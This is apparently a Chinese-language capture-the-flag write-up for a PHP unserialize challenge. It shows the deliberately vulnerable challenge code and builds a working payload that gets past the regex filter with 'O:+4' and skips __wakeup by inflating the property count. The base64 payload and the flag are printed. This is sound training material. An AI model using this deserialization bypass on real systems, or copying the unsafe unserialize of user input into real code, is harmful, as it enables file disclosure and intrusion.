<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
if (isset($_GET['var'])) { //判断变量var是否存在且是否为非空
$var = base64_decode($_GET['var']); //对变量var进行base64解码
if (preg_match('/[oc]:\d+:/i', $var)) {
//正则匹配,若变量var中存在oc字符:数字: /i表示忽略大小写
die('stop hacking!'); //如果上述正则匹配成立,则停止运行并输出'stop hacking!'
} else {
@unserialize($var); //反序列化变量var
}
} else {
highlight_file("index.php"); //对index.php进行PHP语法高亮显示
}
?>看到标题unserialize猜想应该是反序列化,先看看上面的代码分析,既然代码注释中提示为:秘密在fl4g.php中,就用fl4g.php实例化代码,如下:
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
$a = new Demo('fl4g.php');
$b = serialize($a);
echo $b;
?>
输出结果:O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}根据代码,对上述代码的输出结果进行反序列化
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
$a=new Demo('fl4g.php');
$b=serialize($a);
echo $b;
echo '<br/>';
$b=str_replace(':1:',':2:',$b);
$b=str_replace(':4:',':+4:',$b);
echo $b;
echo '</br>';
$c=base64_encode($b);
echo $c;
//输出:
O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}
TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
payload
拿到flag:ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}